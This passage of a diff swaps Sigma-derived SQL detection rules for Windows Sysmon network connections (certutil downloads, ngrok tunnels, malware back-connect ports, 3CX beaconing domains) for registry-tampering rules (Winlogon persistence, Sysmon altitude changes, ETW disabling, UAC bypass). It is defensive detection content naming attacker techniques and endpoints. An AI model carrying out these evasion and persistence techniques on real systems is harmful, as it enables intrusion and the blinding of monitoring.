Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\AVG\\\\Antivirus\\\\RegSvr.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Office\\\\Outlook\\\\Addins\\\\Antivirus.AsOutExt\\\\%' ESCAPE '\\')))" ], - "filename": "net_connection_win_dead_drop_resolvers.yml" + "filename": "registry_set_asep_reg_keys_modification_office.yml" }, { - "title": "Certutil Initiated Connection", - "id": "0dba975d-a193-4ed1-a067-424df57570d1", + "title": "NET NGenAssemblyUsageLog Registry Key Tamper", + "id": "28036918-04d3-423d-91c0-55ecf99fb892", "status": "experimental", - "description": "Detects a network connection intitiated by the certutil.exe tool. Attackers can abuse `certutil.exe` to download malware or offensive security tools.", - "author": "frack113, Florian Roth", + "description": "Detects changes to the NGenAssemblyUsageLog registry key.\n.NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section).\nBy simplify specifying an arbitrary value (e.g. fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.\n", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Legitimate certutil network connection" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\certutil.exe' ESCAPE '\\' AND Initiated = 'true' AND DestinationPort IN ('80', '443', '135', '445'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\NGenAssemblyUsageLog' ESCAPE '\\')" ], - "filename": "net_connection_win_certutil.yml" + "filename": "registry_set_net_cli_ngenassemblyusagelog.yml" }, { - "title": "Equation Editor Network Connection", - "id": "a66bc059-c370-472c-a0d7-f8fd1bf9d583", - "status": "experimental", - "description": "Detects network connections from Equation Editor", - "author": "Max Altgelt (Nextron Systems)", + "title": "Enabling COR Profiler Environment Variables", + "id": "ad89044a-8f49-4673-9a55-cbd88a1b374f", + "status": "test", + "description": "This rule detects cor_enable_profiling and cor_profiler environment variables being set and configured.", + "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", "tags": [ - "attack.execution", - "attack.t1203" - ], - "falsepositives": [ - "Unknown" + "attack.persistence", + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1574.012" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\COR\\_ENABLE\\_PROFILING' ESCAPE '\\' OR TargetObject LIKE '%\\\\COR\\_PROFILER' ESCAPE '\\'))" ], - "filename": "net_connection_win_eqnedt.yml" + "filename": "registry_set_enabling_cor_profiler_env_variables.yml" }, { - "title": "Suspicious Outbound Kerberos Connection", - "id": "e54979bd-c5f9-4d6c-967b-a04b19ac4c74", - "status": "test", - "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", - "author": "Ilyas Ochkov, oscd.community", + "title": "Potential Attachment Manager Settings Attachments Tamper", + "id": "ee77a5db-b0f3-4be2-bfd4-b58be1c6b15a", + "status": "experimental", + "description": "Detects tampering with attachment manager settings policies attachments (See reference for more information)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1558", - "attack.lateral_movement", - "attack.t1550.003" + "attack.defense_evasion" ], "falsepositives": [ - "Web Browsers" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (DestinationPort = '88' AND Initiated = 'true') AND NOT (((Image LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Attachments\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\HideZoneInfoOnProperties' ESCAPE '\\' AND Details = 'DWORD (0x00000001)') OR (TargetObject LIKE '%\\\\SaveZoneInformation' ESCAPE '\\' AND Details = 'DWORD (0x00000002)') OR (TargetObject LIKE '%\\\\ScanWithAntiVirus' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')))" ], - "filename": "net_connection_win_susp_outbound_kerberos_connection.yml" + "filename": "registry_set_policies_attachments_tamper.yml" }, { - "title": "Script Initiated Connection to Non-Local Network", - "id": "992a6cae-db6a-43c8-9cec-76d7195c96fc", + "title": "Potential Persistence Via DLLPathOverride", + "id": "a1b1fd53-9c4a-444c-bae0-34a330fc7aa8", "status": "experimental", - "description": "Detects a script interpreter wscript/cscript opening a network connection to a non-local network. Adversaries may use script to download malicious payloads.", - "author": "frack113, Florian Roth", + "description": "Detects when an attacker adds a new \"DLLPathOverride\" value to the \"Natural Language\" key in order to achieve persistence which will get invoked by \"SearchIndexer.exe\" process", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.persistence" ], "falsepositives": [ - "Legitimate scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND (Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\')) AND NOT (((DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '172.%' ESCAPE '\\' OR DestinationIp LIKE '192.%' ESCAPE '\\' OR DestinationIp LIKE '169.254.%' ESCAPE '\\' OR DestinationIp LIKE '20.%' ESCAPE '\\')) OR ((DestinationIp LIKE '::1%' ESCAPE '\\' OR DestinationIp LIKE '0:0:0:0:0:0:0:1%' ESCAPE '\\' OR DestinationIp LIKE 'fe80:%' ESCAPE '\\' OR DestinationIp LIKE 'fc%' ESCAPE '\\' OR DestinationIp LIKE 'fd%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\ContentIndex\\\\Language\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\StemmerDLLPathOverride%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WBDLLPathOverride%' ESCAPE '\\' OR TargetObject LIKE '%\\\\StemmerClass%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WBreakerClass%' ESCAPE '\\'))" ], - "filename": "net_connection_win_script_wan.yml" + "filename": "registry_set_persistence_natural_language.yml" }, { - "title": "Potential Compromised 3CXDesktopApp Beaconing Activity - Netcon", - "id": "51eecf75-d069-43c7-9ea2-63f75499edd4", + "title": "Disable Sysmon Event Logging Via Registry", + "id": "4916a35e-bfc4-47d0-8e25-a003d7067061", "status": "experimental", - "description": "Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects changes in Sysmon driver altitude. If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.", + "author": "B.Talebi", "tags": [ - "attack.command_and_control" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Legitimate driver altitude change to hide sysmon" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\3CXDesktopApp.exe' ESCAPE '\\' AND (DestinationHostname LIKE '%akamaicontainer.com%' ESCAPE '\\' OR DestinationHostname LIKE '%akamaitechcloudservices.com%' ESCAPE '\\' OR DestinationHostname LIKE '%azuredeploystore.com%' ESCAPE '\\' OR DestinationHostname LIKE '%azureonlinecloud.com%' ESCAPE '\\' OR DestinationHostname LIKE '%azureonlinestorage.com%' ESCAPE '\\' OR DestinationHostname LIKE '%dunamistrd.com%' ESCAPE '\\' OR DestinationHostname LIKE '%glcloudservice.com%' ESCAPE '\\' OR DestinationHostname LIKE '%journalide.org%' ESCAPE '\\' OR DestinationHostname LIKE '%msedgepackageinfo.com%' ESCAPE '\\' OR DestinationHostname LIKE '%msstorageazure.com%' ESCAPE '\\' OR DestinationHostname LIKE '%msstorageboxes.com%' ESCAPE '\\' OR DestinationHostname LIKE '%officeaddons.com%' ESCAPE '\\' OR DestinationHostname LIKE '%officestoragebox.com%' ESCAPE '\\' OR DestinationHostname LIKE '%pbxcloudeservices.com%' ESCAPE '\\' OR DestinationHostname LIKE '%pbxphonenetwork.com%' ESCAPE '\\' OR DestinationHostname LIKE '%pbxsources.com%' ESCAPE '\\' OR DestinationHostname LIKE '%qwepoi123098.com%' ESCAPE '\\' OR DestinationHostname LIKE '%sbmsa.wiki%' ESCAPE '\\' OR DestinationHostname LIKE '%sourceslabs.com%' ESCAPE '\\' OR DestinationHostname LIKE '%visualstudiofactory.com%' ESCAPE '\\' OR DestinationHostname LIKE '%zacharryblogs.com%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Instances\\\\Sysmon Instance\\\\Altitude' ESCAPE '\\')" ], - "filename": "net_connection_win_malware_3cx_compromise_beaconing_activity.yml" + "filename": "registry_set_change_sysmon_driver_altitude.yml" }, { - "title": "Suspicious Typical Malware Back Connect Ports", - "id": "4b89abaa-99fe-4232-afdd-8f9aa4d20382", + "title": "Winlogon Notify Key Logon Persistence", + "id": "bbf59793-6efb-4fa1-95ca-a7d288e52c88", "status": "test", - "description": "Detects programs that connect to typical malware back connect ports based on statistical analysis from two different sandbox system databases", - "author": "Florian Roth (Nextron Systems)", + "description": "Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in.\nWinlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\n", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1571" + "attack.persistence", + "attack.t1547.004" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND DestinationPort IN ('4443', '2448', '8143', '1777', '1443', '243', '65535', '13506', '3360', '200', '198', '49180', '13507', '6625', '4444', '4438', '1904', '13505', '13504', '12102', '9631', '5445', '2443', '777', '13394', '13145', '12103', '5552', '3939', '3675', '666', '473', '5649', '4455', '4433', '1817', '100', '65520', '1960', '1515', '743', '700', '14154', '14103', '14102', '12322', '10101', '7210', '4040', '9943')) AND NOT ((Image LIKE '%\\\\Program Files%' ESCAPE '\\') OR ((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '127.%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Notify\\\\logon' ESCAPE '\\' AND Details LIKE '%.dll' ESCAPE '\\' AND EventType = 'SetValue')" ], - "filename": "net_connection_win_malware_backconnect_ports.yml" + "filename": "registry_set_winlogon_notify_key.yml" }, { - "title": "Regsvr32 Network Activity", - "id": "c7e91a02-d771-4a6d-a700-42587e0b1095", + "title": "Execution DLL of Choice Using WAB.EXE", + "id": "fc014922-5def-4da9-a0fc-28c973f41bfb", "status": "test", - "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", - "author": "Dmitriy Lifanov, oscd.community", + "description": "This rule detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry.", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.execution", - "attack.t1559.001", "attack.defense_evasion", - "attack.t1218.010" + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\WAB\\\\DLLPath' ESCAPE '\\') AND NOT (Details LIKE '\\%CommonProgramFiles\\%\\\\System\\\\wab32.dll' ESCAPE '\\'))" ], - "filename": "net_connection_win_regsvr32_network_activity.yml" + "filename": "registry_set_wab_dllpath_reg_change.yml" }, { - "title": "RDP Over Reverse SSH Tunnel", - "id": "5f699bc5-5446-4a4a-a0b7-5ef2885a3eb4", - "status": "test", - "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389", - "author": "Samir Bousseaden", + "title": "Persistence Via Hhctrl.ocx", + "id": "f10ed525-97fe-4fed-be7c-2feecca941b1", + "status": "experimental", + "description": "Detects when an attacker modifies the registry value of the \"hhctrl\" to point to a custom binary", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1572", - "attack.lateral_movement", - "attack.t1021.001", - "car.2013-07-002" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Initiated = 'true' AND SourcePort = '3389') AND (DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp = '::1'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{52A2AAAE-085D-4187-97EA-8C30DB990436}\\\\InprocServer32\\\\(Default)%' ESCAPE '\\') AND NOT (Details LIKE 'C:\\\\Windows\\\\System32\\\\hhctrl.ocx' ESCAPE '\\'))" ], - "filename": "net_connection_win_rdp_reverse_tunnel.yml" + "filename": "registry_set_hhctrl_persistence.yml" }, { - "title": "Excel Network Connections", - "id": "75e33ce3-ae32-4dcc-9aa8-a2a3029d6f84", - "status": "experimental", - "description": "Detects an Excel process that opens suspicious network connections to non-private IP addresses, and attempts to cover CVE-2021-42292.\nYou will likely have to tune this rule for your organization, but it is certainly something you should look for and could have applications for malicious activity beyond CVE-2021-42292.\n", - "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0\", Tim Shelton", + "title": "UAC Bypass Abusing Winsat Path Parsing - Registry", + "id": "6597be7b-ac61-4ac8-bef4-d3ec88174853", + "status": "test", + "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1203" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "You may have to tune certain domains out that Excel may call out to, such as microsoft or other business use case domains.", - "Office documents commonly have templates that refer to external addresses, like sharepoint.ourcompany.com may have to be tuned.", - "It is highly recommended to baseline your activity and tune out common business use cases." + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' AND Initiated = 'true' AND DestinationIsIpv6 = 'false') AND NOT ((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '127.0.0.1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Root\\\\InventoryApplicationFile\\\\winsat.exe|%' ESCAPE '\\' AND TargetObject LIKE '%\\\\LowerCaseLongPath' ESCAPE '\\' AND Details LIKE 'c:\\\\users\\\\%' ESCAPE '\\' AND Details LIKE '%\\\\appdata\\\\local\\\\temp\\\\system32\\\\winsat.exe' ESCAPE '\\')" ], - "filename": "net_connection_win_excel_outbound_network_connection.yml" + "filename": "registry_set_uac_bypass_winsat.yml" }, { - "title": "Communication To Ngrok.Io", - "id": "18249279-932f-45e2-b37a-8925f2597670", - "status": "experimental", - "description": "Detects an executable accessing ngrok.io, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", - "author": "Florian Roth (Nextron Systems)", + "title": "ETW Logging Disabled In .NET Processes - Sysmon Registry", + "id": "bf4fc428-dcc3-4bbd-99fe-2422aeee2544", + "status": "test", + "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.exfiltration", - "attack.t1567.001" + "attack.defense_evasion", + "attack.t1112", + "attack.t1562" ], "falsepositives": [ - "Legitimate use of ngrok.io" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND DestinationHostname LIKE '%.ngrok.io' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\ETWEnabled' ESCAPE '\\' AND Details = 'DWORD (0x00000000)') OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\COMPlus\\_ETWEnabled' ESCAPE '\\' OR TargetObject LIKE '%\\\\COMPlus\\_ETWFlags' ESCAPE '\\') AND Details IN ('0', 'DWORD (0x00000000)'))))" ], - "filename": "net_connection_win_ngrok_io.yml" + "filename": "registry_set_dot_net_etw_tamper.yml" }, { - "title": "Suspicious Outbound RDP Connections", - "id": "ed74fe75-7594-4b4b-ae38-e38e3fd2eb23", - "status": "test", - "description": "Detects Non-Standard Tools Connecting to TCP port 3389 indicating possible lateral movement", - "author": "Markus Neis", + "title": "Adwind RAT / JRAT - Registry", + "id": "42f0e038-767e-4b85-9d96-2c6335bad0b5", + "status": "experimental", + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.lateral_movement", - "attack.t1021.001", - "car.2013-07-002" - ], - "falsepositives": [ - "Other Remote Desktop RDP tools", - "Domain controller using dns.exe" + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (DestinationPort = '3389' AND Initiated = 'true') AND NOT (((Image LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR Image LIKE '%\\\\RTSApp.exe' ESCAPE '\\' OR Image LIKE '%\\\\RTS2App.exe' ESCAPE '\\' OR Image LIKE '%\\\\RDCMan.exe' ESCAPE '\\' OR Image LIKE '%\\\\ws\\_TunnelService.exe' ESCAPE '\\' OR Image LIKE '%\\\\RSSensor.exe' ESCAPE '\\' OR Image LIKE '%\\\\RemoteDesktopManagerFree.exe' ESCAPE '\\' OR Image LIKE '%\\\\RemoteDesktopManager.exe' ESCAPE '\\' OR Image LIKE '%\\\\RemoteDesktopManager64.exe' ESCAPE '\\' OR Image LIKE '%\\\\mRemoteNG.exe' ESCAPE '\\' OR Image LIKE '%\\\\mRemote.exe' ESCAPE '\\' OR Image LIKE '%\\\\Terminals.exe' ESCAPE '\\' OR Image LIKE '%\\\\spiceworks-finder.exe' ESCAPE '\\' OR Image LIKE '%\\\\FSDiscovery.exe' ESCAPE '\\' OR Image LIKE '%\\\\FSAssessment.exe' ESCAPE '\\' OR Image LIKE '%\\\\MobaRTE.exe' ESCAPE '\\' OR Image LIKE '%\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Passwordstate.exe' ESCAPE '\\' OR Image LIKE '%\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\Ranger\\\\SentinelRanger.exe' ESCAPE '\\' OR Image LIKE '%\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\') OR Image LIKE 'C:\\\\Program Files\\\\SplunkUniversalForwarder\\\\bin\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\') OR (Image = '') OR (Image = '')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND Details LIKE '\\%AppData\\%\\\\Roaming\\\\Oracle\\\\bin\\\\%' ESCAPE '\\')" ], - "filename": "net_connection_win_susp_rdp.yml" + "filename": "registry_set_mal_adwind.yml" }, { - "title": "Microsoft Binary Suspicious Communication Endpoint", - "id": "e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97", + "title": "RDP Sensitive Settings Changed", + "id": "3f6b7b62-61aa-45db-96bd-9c31b36b653c", "status": "test", - "description": "Detects an executable in the Windows folder accessing suspicious domains", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects tampering of RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc\n", + "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", "tags": [ - "attack.lateral_movement", - "attack.t1105" + "attack.defense_evasion", + "attack.persistence", + "attack.t1112" ], "falsepositives": [ - "Unknown" + "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND (DestinationHostname LIKE '%dl.dropboxusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%.pastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%cdn.discordapp.com/attachments/' ESCAPE '\\' OR DestinationHostname LIKE '%mediafire.com' ESCAPE '\\' OR DestinationHostname LIKE '%mega.nz' ESCAPE '\\' OR DestinationHostname LIKE '%ddns.net' ESCAPE '\\' OR DestinationHostname LIKE '%.paste.ee' ESCAPE '\\' OR DestinationHostname LIKE '%.hastebin.com/raw/' ESCAPE '\\' OR DestinationHostname LIKE '%.ghostbin.co/' ESCAPE '\\' OR DestinationHostname LIKE '%ufile.io' ESCAPE '\\' OR DestinationHostname LIKE '%anonfiles.com' ESCAPE '\\' OR DestinationHostname LIKE '%send.exploit.in' ESCAPE '\\' OR DestinationHostname LIKE '%transfer.sh' ESCAPE '\\' OR DestinationHostname LIKE '%privatlab.net' ESCAPE '\\' OR DestinationHostname LIKE '%privatlab.com' ESCAPE '\\' OR DestinationHostname LIKE '%sendspace.com' ESCAPE '\\' OR DestinationHostname LIKE '%pastetext.net' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.pl' ESCAPE '\\' OR DestinationHostname LIKE '%paste.ee' ESCAPE '\\') AND (Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\Shadow' ESCAPE '\\' AND Details IN ('DWORD (0x00000001)', 'DWORD (0x00000002)', 'DWORD (0x00000003)', 'DWORD (0x00000004)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\%' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\fAllowUnsolicited' ESCAPE '\\' OR TargetObject LIKE '%\\\\fAllowUnsolicitedFullControl' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\services\\\\TermService\\\\Parameters\\\\ServiceDll%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\InitialProgram%' ESCAPE '\\'))))" ], - "filename": "net_connection_win_binary_susp_com.yml" + "filename": "registry_set_terminal_server_tampering.yml" }, { - "title": "Communication To Ngrok Tunneling Service", - "id": "1d08ac94-400d-4469-a82f-daee9a908849", - "status": "experimental", - "description": "Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", - "author": "Florian Roth (Nextron Systems)", + "title": "New File Association Using Exefile", + "id": "44a22d59-b175-4f13-8c16-cbaef5b581ff", + "status": "test", + "description": "Detects the abuse of the exefile handler in new file association. Used for bypass of security products.", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ - "attack.exfiltration", - "attack.command_and_control", - "attack.t1567", - "attack.t1568.002", - "attack.t1572", - "attack.t1090", - "attack.t1102", - "attack.s0508" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate use of ngrok" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (DestinationHostname LIKE '%tunnel.us.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.eu.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.ap.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.au.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.sa.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.jp.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.in.ngrok.com%' 